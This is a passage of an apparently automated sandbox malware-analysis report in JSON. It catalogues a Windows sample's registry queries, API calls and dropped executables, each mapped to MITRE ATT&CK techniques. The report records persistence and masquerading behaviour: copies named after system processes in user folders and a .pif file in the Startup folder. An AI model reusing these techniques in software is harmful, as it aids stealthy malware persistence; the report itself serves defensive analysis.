\"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00005136]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00005628]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00005628]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00005628]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00005404]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00005628]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08\\New Folder.exe]- [targetUID: 00000000-00005404]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00005628]\n \"IEXPLORER.EXE.67EE4669.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00005628]\n \"IEXPLORER.EXE.67EE4994.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00005628]\n \"D3_08.EXE.67EE4992.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE4667.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"PuRn4m4.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [C:\\PuRn4m4.txt]- [targetUID: 00000000-00005628]\n \"desktop.ini\" has type \"Windows desktop.ini\"- Location: [C:\\desktop.ini]- [targetUID: 00000000-00005628]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00005136]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00005628]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00005136]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00005628]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00005136]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00005628]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00005136]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00005628]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00005628]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00005628]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00005628]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00005628]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00005628]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00005628]\n \"D3_08.EXE.67EE4B9C.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00005628]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" connecting to \"\\ThemeApiPort\"\n \"D3_08.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Windows\\D3_08.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Windows\\System32\\MrD3_08.scr\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" queries basic process information of the \"C:\\share\\D3_08\\New Folder.exe\" (UID: 5136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\winlogon.exe\" (UID: 5136)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 5412)\n \"IExplorer.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 5412)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 5156)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5156)\n \"CSRSS.EXE\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 5628)\n \"CSRSS.EXE\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 5628)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"USEFILTER\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"MSVBVM60.DLL\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"946B376A771CF97E6AA7E88DE9157CF4794255C614BD946E2B53AE5B6C731D96\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005620)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005244)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005348)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005364)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebdc75a09c2c0000c0fd7f9a5c897700f0fd7f60c6120044c0fd7f00000000400000003f0000002000000000c0fd7f54c61200c15c8977608290772000000000c0fd7f9a5c897700f0fd7f78c61200578988778083907713179175d8ebdc75 (UID: 00000000-00005136)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebdc7590f41f000060fd7f9a5c897700f0fd7f60c612004460fd7f00000000400000003f000000200000000060fd7f54c61200c15c897760829077200000000060fd7f9a5c897700f0fd7f78c61200578988778083907713179175d8ebdc75 (UID: 00000000-00005404)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21bcf01d01bcf010016cf010000cc01e414cf018800000088000000176888779817cf01ff2b88771d81a077a41bcf01ac012200000022000000cc01c06dcc011200a200ce040000c06dcc015016cf01100000000000000013009d00ce040000c06dcc01 (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebdc7500e5260000c0fd7f9a5c897700f0fd7f60c6120044c0fd7f00000000400000003f0000002000000000c0fd7f54c61200c15c8977608290772000000000c0fd7f9a5c897700f0fd7f78c61200578988778083907713179175d8ebdc75 (UID: 00000000-00005412)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21b3b01d01b3b0100163b0100003801e4143b0188000000880000001768887798173b01ff2b88772cdba777a41b3b01ac0116000000160000003801c06d380114009800f4010000c06d380150163b01100000000000000015009300f4010000c06d3801 (UID: 00000000-00005436)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21bdd01d01bdd010016dd010000da01e414dd018800000088000000176888779817dd01ff2b88777772a177a41bdd01ac012d0000002d000000da01c06dda011200a20090050000c06dda015016dd01100000000000000013009d0090050000c06dda01 (UID: 00000000-00005620)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebdc757002230000f0fd7f9a5c897700e0fd7f60c6120044f0fd7f00000000400000003f0000001f00000000f0fd7f54c61200c15c8977608290771f00000000f0fd7f9a5c897700e0fd7f78c61200578988778083907713179175d8ebdc75 (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21bde01d01bde010016de010000db01e414de018800000088000000176888779817de01ff2b88770975a177a41bde01ac011b0000001b000000db01c06ddb011400980061010000c06ddb015016de0110000000000000001500930061010000c06ddb01 (UID: 00000000-00005324)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a00100005a1bd301581bd3018815d3010000d0016c14d3018800000088000000176888772017d301ff2b88776568a1772c1bd301ac015f0000005f000000d001905bd0011000ac003e040000905bd001d815d30110000000000000001100a7003e040000905bd001 (UID: 00000000-00005244)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21b6600d01b66000016660000006300e414660088000000880000001768887798176600ff2b88776e69a177a41b6600ac011f0000001f0000006300c06d63001200a20039040000c06d630050166600100000000000000013009d0039040000c06d6300 (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebdc7530a4230000f0fd7f9a5c897700e0fd7f60c6120044f0fd7f00000000400000003f0000001f00000000f0fd7f54c61200c15c8977608290771f00000000f0fd7f9a5c897700e0fd7f78c61200578988778083907713179175d8ebdc75 (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21bd101d01bd1010016d1010000ce01e414d1018800000088000000176888779817d101ff2b88770e62a177a41bd101ac012c0000002c000000ce01c06dce011200a2003c040000c06dce015016d101100000000000000013009d003c040000c06dce01 (UID: 00000000-00005348)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21b4f01d01b4f0100164f0100004c01e4144f0188000000880000001768887798174f01ff2b88775961a177a41b4f01ac0119000000190000004c01c06d4c011200a200fb040000c06d4c0150164f01100000000000000013009d00fb040000c06d4c01 (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21bc301d01bc3010016c3010000c001e414c3018800000088000000176888779817c301ff2b8877ebbba777a41bc301ac012400000024000000c001c06dc0011200a2003c040000c06dc0015016c301100000000000000013009d003c040000c06dc001 (UID: 00000000-00005364)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a00100005a1be001581be0018815e0010000dd016c14e0018800000088000000176888772017e001ff2b8877c265a1772c1be001ac011600000016000000dd01905bdd011000ac0090050000905bdd01d815e00110000000000000001100a70090050000905bdd01 (UID: 00000000-00005916)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21bd801d01bd8010016d8010000d501e414d8018800000088000000176888779817d801ff2b88774b58a177a41bd801ac011e0000001e000000d501c06dd50114009800ef010000c06dd5015016d801100000000000000015009300ef010000c06dd501 (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebdc75e02123000070fd7f9a5c897700f0fd7f60c612004470fd7f00000000400000003f000000200000000070fd7f54c61200c15c897760829077200000000070fd7f9a5c897700f0fd7f78c61200578988778083907713179175d8ebdc75 (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 